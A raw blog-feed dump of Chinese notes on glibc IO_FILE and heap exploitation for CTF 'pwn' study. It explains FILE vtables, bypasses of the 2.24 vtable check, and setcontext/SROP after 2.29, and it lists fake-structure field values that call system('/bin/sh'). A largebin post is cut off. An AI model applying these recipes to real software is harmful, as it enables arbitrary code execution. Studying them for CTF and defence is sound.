class="hljs-variable">_IO_off_t</span> <span class="hljs-variable">_old_offset</span>; <span class="hljs-comment">/* This used to be _offset but it's too small. */</span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> __HAVE_COLUMN <span class="hljs-comment">/* temporary */</span></span><br> <span class="hljs-comment">/* 1+column number of pbase(); 0 is unknown. */</span><br> unsigned short <span class="hljs-variable">_cur_column</span>;<br> signed char <span class="hljs-variable">_vtable_offset</span>;<br> char <span class="hljs-variable">_shortbuf</span>[<span class="hljs-number">1</span>];<br><br> <span class="hljs-comment">/* char* _save_gptr; char* _save_egptr; */</span><br><br> <span class="hljs-variable">_IO_lock_t</span> *<span class="hljs-variable">_lock</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> _IO_USE_OLD_IO_FILE</span><br>};<br><br>struct <span class="hljs-variable">_IO_FILE_complete</span><br>{<br> struct <span class="hljs-variable">_IO_FILE</span> <span class="hljs-variable">_file</span>;<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">if</span> defined _G_IO_IO_FILE_VERSION && _G_IO_IO_FILE_VERSION == 0x20001</span><br> <span class="hljs-variable">_IO_off64_t</span> <span class="hljs-variable">_offset</span>;<br><span class="hljs-meta"># <span class="hljs-keyword">if</span> defined _LIBC || defined _GLIBCPP_USE_WCHAR_T</span><br> <span class="hljs-comment">/* Wide character stream stuff. */</span><br> struct <span class="hljs-variable">_IO_codecvt</span> *<span class="hljs-variable">_codecvt</span>;<br> struct <span class="hljs-variable">_IO_wide_data</span> *<span class="hljs-variable">_wide_data</span>;<br> struct <span class="hljs-variable">_IO_FILE</span> *<span class="hljs-variable">_freeres_list</span>;<br> void *<span class="hljs-variable">_freeres_buf</span>;<br><span class="hljs-meta"># <span class="hljs-keyword">else</span></span><br> void *<span class="hljs-variable">__pad1</span>;<br> void *<span class="hljs-variable">__pad2</span>;<br> void *<span class="hljs-variable">__pad3</span>;<br> void *<span class="hljs-variable">__pad4</span>;<br><span class="hljs-meta"># <span class="hljs-keyword">endif</span></span><br> size_t <span class="hljs-variable">__pad5</span>;<br> int <span class="hljs-variable">_mode</span>;<br> <span class="hljs-comment">/* Make sure we don't get into trouble again. */</span><br> char <span class="hljs-variable">_unused2</span>[<span class="hljs-number">15</span> * <span class="hljs-built_in">sizeof</span> (int) - <span class="hljs-number">4</span> * <span class="hljs-built_in">sizeof</span> (void *) - <span class="hljs-built_in">sizeof</span> (size_t)];<br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br>};<br></code></pre></td></tr></table></figure><p>FILE结构通过其中的 <code>_chain</code>形成链表,_IO_list_all指向链表起始位置,顺序为<code>_IO_list_all->stderr->stdout->stdin</code></p><p>64位 <code>_IO_FILE_plus</code>内部偏移如下:</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs sqf"><span class="hljs-number">0</span>x0 <span class="hljs-variable">_flags</span><br><span class="hljs-number">0</span>x8 <span class="hljs-variable">_IO_read_ptr</span><br><span class="hljs-number">0</span>x10 <span class="hljs-variable">_IO_read_end</span><br><span class="hljs-number">0</span>x18 <span class="hljs-variable">_IO_read_base</span><br><span class="hljs-number">0</span>x20 <span class="hljs-variable">_IO_write_base</span><br><span class="hljs-number">0</span>x28 <span class="hljs-variable">_IO_write_ptr</span><br><span class="hljs-number">0</span>x30 <span class="hljs-variable">_IO_write_end</span><br><span class="hljs-number">0</span>x38 <span class="hljs-variable">_IO_buf_base</span><br><span class="hljs-number">0</span>x40 <span class="hljs-variable">_IO_buf_end</span><br><span class="hljs-number">0</span>x48 <span class="hljs-variable">_IO_save_base</span><br><span class="hljs-number">0</span>x50 <span class="hljs-variable">_IO_backup_base</span><br><span class="hljs-number">0</span>x58 <span class="hljs-variable">_IO_save_end</span><br><span class="hljs-number">0</span>x60 <span class="hljs-variable">_markers</span><br><span class="hljs-number">0</span>x68 <span class="hljs-variable">_chain</span><br><span class="hljs-number">0</span>x70 <span class="hljs-variable">_fileno</span><br><span class="hljs-number">0</span>x74 <span class="hljs-variable">_flags2</span><br><span class="hljs-number">0</span>x78 <span class="hljs-variable">_old_offset</span><br><span class="hljs-number">0</span>x80 <span class="hljs-variable">_cur_column</span><br><span class="hljs-number">0</span>x82 <span class="hljs-variable">_vtable_offset</span><br><span class="hljs-number">0</span>x83 <span class="hljs-variable">_shortbuf</span><br><span class="hljs-number">0</span>x88 <span class="hljs-variable">_lock</span><br><span class="hljs-number">0</span>x90 <span class="hljs-variable">_offset</span><br><span class="hljs-number">0</span>x98 <span class="hljs-variable">_codecvt</span><br><span class="hljs-number">0</span>xa0 <span class="hljs-variable">_wide_data</span><br><span class="hljs-number">0</span>xa8 <span class="hljs-variable">_freeres_list</span><br><span class="hljs-number">0</span>xb0 <span class="hljs-variable">_freeres_buf</span><br><span class="hljs-number">0</span>xb8 <span class="hljs-variable">__pad5</span><br><span class="hljs-number">0</span>xc0 <span class="hljs-variable">_mode</span><br><span class="hljs-number">0</span>xc4 <span class="hljs-variable">_unused2</span><br><span class="hljs-number">0</span>xd8 vtable<br></code></pre></td></tr></table></figure><p>vtable是<code>_IO_jump_t</code>类型的指针,<code>_IO_jump_t</code>中保存了一些函数指针,在后面我们会看到在一系列标准IO函数中会调用这些函数指针,该类型在libc文件中的导出符号是<code>_IO_file_jumps</code>,<code>_IO_jump_t</code>如下:</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-keyword">struct</span> _IO_jump_t<br>{<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">size_t</span>, <span class="hljs-params">__dummy</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">size_t</span>, <span class="hljs-params">__dummy2</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_finish_t</span>, <span class="hljs-params">__finish</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_overflow_t</span>, <span class="hljs-params">__overflow</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_underflow_t</span>, <span class="hljs-params">__underflow</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_underflow_t</span>, <span class="hljs-params">__uflow</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_pbackfail_t</span>, <span class="hljs-params">__pbackfail</span>)</span>;<br> <span class="hljs-comment">/* showmany */</span><br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_xsputn_t</span>, <span class="hljs-params">__xsputn</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_xsgetn_t</span>, <span class="hljs-params">__xsgetn</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_seekoff_t</span>, <span class="hljs-params">__seekoff</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_seekpos_t</span>, <span class="hljs-params">__seekpos</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_setbuf_t</span>, <span class="hljs-params">__setbuf</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_sync_t</span>, <span class="hljs-params">__sync</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_doallocate_t</span>, <span class="hljs-params">__doallocate</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_read_t</span>, <span class="hljs-params">__read</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_write_t</span>, <span class="hljs-params">__write</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_seek_t</span>, <span class="hljs-params">__seek</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_close_t</span>, <span class="hljs-params">__close</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_stat_t</span>, <span class="hljs-params">__stat</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_showmanyc_t</span>, <span class="hljs-params">__showmanyc</span>)</span>;<br> <span class="hljs-constructor">JUMP_FIELD(<span class="hljs-params">_IO_imbue_t</span>, <span class="hljs-params">__imbue</span>)</span>;<br>#<span class="hljs-keyword">if</span> <span class="hljs-number">0</span><br> get_column;<br> set_column;<br>#endif<br>};<br></code></pre></td></tr></table></figure><p>每一个FILE结构中的vtable指针指向同一个位置,通常会将_IO_overflow_t,改为system或onegadget地址完成利用。</p><p>输出函数调用<code>_IO_file_xsputn</code>,输入函数调用<code>_IO_file_xsgetn</code></p><p>一些c函数对_IO_jump_t虚表里面函数的调用情况:</p><ul><li>printf/puts 最终会调用<code>_IO_file_xsputn</code></li><li>fclose 最终会调用<code>_IO_FILE_FINISH</code></li><li>fwrite最终会调用<code>_IO_file_xsputn</code></li><li>fread 最终会调用<code>_IO_file_xsgetn</code></li><li>scanf/gets最终会调用<code>_IO_file_xsgetn</code></li></ul><h2 id="IO-flush-all-lockp"><a href="#IO-flush-all-lockp" class="headerlink" title="_IO_flush_all_lockp"></a>_IO_flush_all_lockp</h2><p>调用<code>_IO_flush_all_lockp</code>时,这个函数会刷新<code>_IO_list_all</code> 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用<code>_IO_FILE_plus.vtable</code> 中的_IO_overflow</p><p>我们重点关注这个函数及相关调用是因为攻击者常常利用这个函数来进行一系列的攻击操作</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs sqf">int<br><span class="hljs-variable">_IO_flush_all_lockp</span> (int do_lock)<br>{<br> ...<br> fp = (<span class="hljs-variable">_IO_FILE</span> *) <span class="hljs-variable">_IO_list_all</span>;<br> <span class="hljs-keyword">while</span> (fp != NULL)<br> {<br> ...<br> <span class="hljs-keyword">if</span> (((fp-><span class="hljs-variable">_mode</span> <= <span class="hljs-number">0</span> && fp-><span class="hljs-variable">_IO_write_ptr</span> > fp-><span class="hljs-variable">_IO_write_base</span>))<br> && <span class="hljs-variable">_IO_OVERFLOW</span> (fp, EOF) == EOF)<br> {<br> result = EOF;<br> }<br> ...<br> }<br>}<br></code></pre></td></tr></table></figure><p>_IO_flush_all_lockp 不需要攻击者手动调用,在一些情况下这个函数会被系统调用:</p><ol><li><p>当 libc 执行 abort 流程时</p></li><li><p>当执行 exit 函数时</p></li><li><p>当执行流从 main 函数返回时</p></li></ol><p>且为了使<code>_IO_flush_all_lockp</code>能正常工作,我们要满足调用<code>_IO_OVERFLOW</code>的其他条件,即</p><ul><li>fp->_mode <= 0</li><li>fp-><code>_IO_write_ptr</code> > fp-><code>_IO_write_base</code></li></ul><p>由此构造<code>_IO_FILE_plus</code>和vtable的<code>_IO_OVERFLOW</code>(位于0x18偏移处)</p><h2 id="2-24新增检测"><a href="#2-24新增检测" class="headerlink" title="2.24新增检测"></a>2.24新增检测</h2><p>2.23可以直接把vtable劫持到可写字段,但是在2.24加入了对vtable地址的检验<code>IO_validate_vtable</code>,调用虚函数前会检查vtable的地址是否在一定范围内,不符则引发abort。</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs abnf">IO_validate_vtable (const struct _IO_jump_t *vtable)<br>{<br> uintptr_t section_length <span class="hljs-operator">=</span> __stop___libc_IO_vtables - __start___libc_IO_vtables<span class="hljs-comment">;</span><br> uintptr_t ptr <span class="hljs-operator">=</span> (uintptr_t) vtable<span class="hljs-comment">;</span><br> uintptr_t offset <span class="hljs-operator">=</span> ptr - (uintptr_t) __start___libc_IO_vtables<span class="hljs-comment">;</span><br> if (__glibc_unlikely (offset ><span class="hljs-operator">=</span> section_length))<br> _IO_vtable_check ()<span class="hljs-comment">;</span><br> return vtable<span class="hljs-comment">;</span><br>}<br></code></pre></td></tr></table></figure><p>我们注意到在给定范围内还存在了一些与原本vtable结构相同的虚表——<code>_IO_str_jumps</code>和<code>IO_wstr_jumps</code>只要对他们进行构造同样能实现利用</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">const <span class="hljs-keyword">struct</span> _IO_jump_t _IO_str_jumps libio_vtable =<br>{<br> JUMP_INIT_DUMMY, (size=<span class="hljs-number">0x10</span>)<br> <span class="hljs-constructor">JUMP_INIT(<span class="hljs-params">finish</span>, <span class="hljs-params">_IO_str_finish</span>)</span>,<br> <span class="hljs-constructor">JUMP_INIT(<span class="hljs-params">overflow</span>, <span class="hljs-params">_IO_str_overflow</span>)</span>,<br> <span class="hljs-constructor">JUMP_INIT(<span class="hljs-params">underflow</span>, <span class="hljs-params">_IO_str_underflow</span>)</span>,<br> ……<br> }<br></code></pre></td></tr></table></figure><p>先看<code>_IO_str_jumps</code>的_IO_str_overflow</p><figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs moonscript">#define _IO_blen(fp) (<span class="hljs-function"><span class="hljs-params">(fp)</span>-></span>_IO_buf_end - (fp)->_IO_buf_base)<br>_IO_str_overflow (_IO_FILE *fp, int c)<br>{<br> ……<br> size_t old_blen = _IO_blen (fp);<br> _IO_size_t new_size = <span class="hljs-number">2</span> * old_blen + <span class="hljs-number">100</span>;<br> <span class="hljs-keyword">if</span> (new_size < old_blen)<br> <span class="hljs-keyword">return</span> EOF;<br><span class="hljs-function"> <span class="hljs-title">new_buf</span></span><br><span class="hljs-function"> = <span class="hljs-params">(char *)</span> <span class="hljs-params">(*((_IO_strfile *) fp)->_s._allocate_buffer)</span> <span class="hljs-params">(new_size)</span>;</span><br><span class="hljs-function"> ……</span><br><span class="hljs-function">}</span><br></code></pre></td></tr></table></figure><p>其中<code>_s._allocate_buffer</code>指向fp+0xe8偏移处,因为newsize的值需要通过计算得到,注意使/bin/sh的地址为2的倍数</p><p>由此,我们需要构造条件</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_read_ptr = <span class="hljs-number">0</span>x61 , smallbin4 + <span class="hljs-number">8</span> (smallbin size)<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_<span class="hljs-function"><span class="hljs-title">read_base</span> = _IO_list_all -0x10 , smallbin -></span> bk, unsorted bin attack <br>(以上为绕过_IO_flush_all_lockp的条件)<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_flags = <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_buf_base = <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_buf_end = (bin_sh_addr - <span class="hljs-number">100</span>) / <span class="hljs-number">2</span>#如果bin/sh地址以奇数结尾可以+<span class="hljs-number">1</span>以避免向下取整<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_write_ptr = (bin_sh_addr - <span class="hljs-number">100</span>) / <span class="hljs-number">2</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_write_base = <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_mode = -<span class="hljs-number">1</span> (等价于EOF)<br>fp+<span class="hljs-number">0</span>xe0 = system<br></code></pre></td></tr></table></figure><p>也可以利用<code>_IO_str_jumps</code>的_IO_str_finish</p><figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs livescript"><span class="hljs-literal">void</span><br>_IO_str_finish (_IO_FILE *fp, int dummy)<br>{<br> <span class="hljs-keyword">if</span> (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))<br> <span class="hljs-function"><span class="hljs-params">(((_IO_strfile *) fp)->_s._free_buffer)</span> <span class="hljs-params">(fp->_IO_buf_base)</span>;</span><br><span class="hljs-function"> <span class="hljs-title">fp</span>-></span>_IO_buf_base = NULL;<br> ……<br>}<br></code></pre></td></tr></table></figure><p>这个利用更加简单,不过注意给<code>_IO_str_jumps</code>加上偏移, <code>_s._free_buffer</code>同样在fp+0xe8偏移处</p><p>其利用条件更简单,只需要</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_mode = <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_<span class="hljs-function"><span class="hljs-title">write_ptr</span> > fp-></span>_IO_write_base<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_read_ptr = <span class="hljs-number">0</span>x61 , smallbin4 + <span class="hljs-number">8</span> (smallbin size)<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_<span class="hljs-function"><span class="hljs-title">read_base</span> = _IO_list_all -0x10 , smallbin -></span> bk, unsorted bin attack <br>(以上为绕过_IO_flush_all_lockp的条件)<br>vtable = _IO_str_jumps - <span class="hljs-number">8</span> (这样调用_IO_overflow时会调用到 _IO_str_finish)<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_flags= <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_buf_base = binsh_addr<br>fp+<span class="hljs-number">0</span>xe8 = system_addr<br></code></pre></td></tr></table></figure><h2 id="2-28限制任意函数执行"><a href="#2-28限制任意函数执行" class="headerlink" title="2.28限制任意函数执行"></a>2.28限制任意函数执行</h2><p>在2.24地址检测的基础上,2.28变更了可以造成任意函数调用的漏洞代码</p><p>从原来的偏移函数调用,改为了直接的函数调用</p><p>如<code>_IO_str_jumps</code>的_IO_str_overflow在2.28为</p><figure class="highlight haxe"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs haxe">int<br>_IO_str_overflow (FILE *fp, int c)<br>{<br> …………<br> <span class="hljs-keyword">if</span> (pos >= (size_t) (_IO_blen (fp) + flush_only))<br> {<br> <span class="hljs-keyword">if</span> (fp->_flags & _IO_USER_BUF) <span class="hljs-comment">/* not allowed to enlarge */</span><br><span class="hljs-keyword">return</span> EOF;<br> <span class="hljs-keyword">else</span><br>{<br> char *<span class="hljs-keyword">new</span><span class="hljs-type">_buf</span>;<br> char *old_buf = fp->_IO_buf_base;<br> size_t old_blen = _IO_blen (fp);<br> size_t <span class="hljs-keyword">new</span><span class="hljs-type">_size</span> = <span class="hljs-number">2</span> * old_blen + <span class="hljs-number">100</span>;<br> <span class="hljs-keyword">if</span> (<span class="hljs-keyword">new</span><span class="hljs-type">_size</span> < old_blen)<br> <span class="hljs-keyword">return</span> EOF;<br> <span class="hljs-keyword">new</span><span class="hljs-type">_buf</span> = malloc (<span class="hljs-keyword">new</span><span class="hljs-type">_size</span>);<br> <span class="hljs-comment">//原为new_buf = (char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size);</span><br> …………<br> fp->_IO_write_base = <span class="hljs-keyword">new</span><span class="hljs-type">_buf</span>;<br> …………<br> }<br> …………<br> <span class="hljs-keyword">return</span> c;<br>}<br></code></pre></td></tr></table></figure><p>2.28下的_IO_str_finish</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xl">void<br>_IO_str_finish (FILE *fp, int dummy)<br>{<br> <span class="hljs-function"><span class="hljs-title">if</span> (fp-></span>_IO_<span class="hljs-function"><span class="hljs-title">buf_base</span> && !(fp-></span>_flags & _IO_USER_BUF))<br> <span class="hljs-function"><span class="hljs-title">free</span> (fp-></span>_IO_buf_base);<br> <span class="hljs-comment">//原为(((_IO_strfile *) fp)->_s._free_buffer) (fp->_IO_buf_base)</span><br> <span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_buf_base = NULL;<br><br> _IO_default_finish (fp, <span class="hljs-number">0</span>);<br>}<br></code></pre></td></tr></table></figure><p>此时,虽然条件相较之前没有变化,但攻击者能控制的仅有malloc和free等函数的参数,可以通过这种方法申请非预期大小的chunk,而地址指针存储于_IO_write_base,即0x20偏移处</p><h2 id="2-29后新利用形式"><a href="#2-29后新利用形式" class="headerlink" title="2.29后新利用形式"></a>2.29后新利用形式</h2><p>结合2.29版本后setcontex函数变化,观察汇编代码,_IO_str_overflow出现一些有趣的利用方式</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs x86asm"><span class="hljs-number">0x7ffff7e6eb4f</span> <__GI__IO_str_overflow+<span class="hljs-number">47</span>>:<span class="hljs-keyword">je</span> <span class="hljs-number">0x7ffff7e6ec80</span> <__GI__IO_str_overflow+<span class="hljs-number">352</span>><br><span class="hljs-number">0x7ffff7e6eb55</span> <__GI__IO_str_overflow+<span class="hljs-number">53</span>>:<span class="hljs-keyword">mov</span> <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rdi</span>+<span class="hljs-number">0x28</span>] <----<br><span class="hljs-number">0x7ffff7e6eb59</span> <__GI__IO_str_overflow+<span class="hljs-number">57</span>>:<span class="hljs-keyword">mov</span> <span class="hljs-built_in">r14</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbx</span>+<span class="hljs-number">0x38</span>]<br><span class="hljs-number">0x7ffff7e6eb5d</span> <__GI__IO_str_overflow+<span class="hljs-number">61</span>>:<span class="hljs-keyword">mov</span> <span class="hljs-built_in">r12</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbx</span>+<span class="hljs-number">0x40</span>]<br><br></code></pre></td></tr></table></figure><p>在调用malloc之前,有一条指令讲rdi+0x28的值赋给了rdx,由于此时rdi指向IO_FILE_plus的头部,所以rdx的值为_IO_write_ptr</p><p>而在glibc2.29的版本上setcontext的利用从以前的rdi变为了rdx,因此攻击者可以通过这个位置来进行新版下的setcontext,进而实现<strong>srop</strong></p><p>步骤为</p><ol><li>控制malloc_hook为setcontext函数</li><li>进入io_str_overflow时首先将rdx赋值为填充了context的地址(此时同时满足了<code>fp->_IO_write_ptr - fp->_IO_write_base >= _IO_buf_end - _IO_buf_base</code>)</li><li>调用malloc触发malloc_hook中函数,控制程序执行</li></ol><p>往后到2.31,针对IO_File利用的相关代码并没有发生其他具有影响性的变化,这里就不赘述了。</p>]]></content>
<tags>
<tag>pwn</tag>
</tags>
</entry>
<entry>
<title>堆学习整理(二)</title>
<link href="/2022/03/14/%E5%A0%86%E5%AD%A6%E4%B9%A0%E6%95%B4%E7%90%86%EF%BC%88%E4%BA%8C%EF%BC%89/"/>
<url>/2022/03/14/%E5%A0%86%E5%AD%A6%E4%B9%A0%E6%95%B4%E7%90%86%EF%BC%88%E4%BA%8C%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="Largebin"><a href="#Largebin" class="headerlink" title="Largebin"></a>Largebin</h2><ol><li><p>_int_malloc中最后一个判断,要求size大于smallbin范围(即32位:size>0x1F8,64位:size>0x3f0)</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-keyword">if</span> ((<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) (nb) <= (<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>) (<span class="hljs-built_in">get_max_fast</span> ())){……}<br><span class="hljs-keyword">if</span> (<span class="hljs-built_in">in_smallbin_range</span> (nb)){……}<br><span class="hljs-keyword">else</span> <span class="hljs-comment">//对largebin操作</span><br> {<br> ……<br> }<br></code></pre></td></tr></table></figure></li><li><p>有fd、bk、fd_nextsize、bk_nextsize四个指针,构成<strong>双向链表</strong></p><ul><li>fd_nextsize指向前一个与当前chunk大小不同的第一个空闲块</li><li>bk_nextsize指向后一个与当前chunk大小不同的第一个空闲块</li><li>一般空闲的large chunk在fd的遍历顺序中,按照由大到小的顺序排列</li></ul></li><li><p>被free的符合条件chunk会先出现在unsortedbin中,在malloc一个新chunk时,如果unsorted bin中存在符合条件chunk,挂入largebin</p></li><li><p>挂入largebin的位置选择过程为</p><ol><li><p>size小于chunk中最小size,直接到链表末端</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">if</span> ((unsigned long) (size) < (unsigned long) (bck-></span><span class="hljs-function"><span class="hljs-title">bk</span>-></span>size))<span class="hljs-comment">// size小于chunk中最小size</span><br> {<br> fwd = bck;<br> <span class="hljs-function"><span class="hljs-title">bck</span> = bck-></span>bk;<br><br> <span class="hljs-function"><span class="hljs-title">victim</span>-></span><span class="hljs-function"><span class="hljs-title">fd_nextsize</span> = fwd-></span>fd;<br> <span class="hljs-function"><span class="hljs-title">victim</span>-></span><span class="hljs-function"><span class="hljs-title">bk_nextsize</span> = fwd-></span><span class="hljs-function"><span class="hljs-title">fd</span>-></span>bk_nextsize;<br> <span class="hljs-function"><span class="hljs-title">fwd</span>-></span><span class="hljs-function"><span class="hljs-title">fd</span>-></span><span class="hljs-function"><span class="hljs-title">bk_nextsize</span> = victim-></span><span class="hljs-function"><span class="hljs-title">bk_nextsize</span>-></span>fd_nextsize = victim;<br> }<br></code></pre></td></tr></table></figure></li><li><p>size大于等于时,victim插入在size相等或大于的chunk之后(bk)</p></li></ol><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 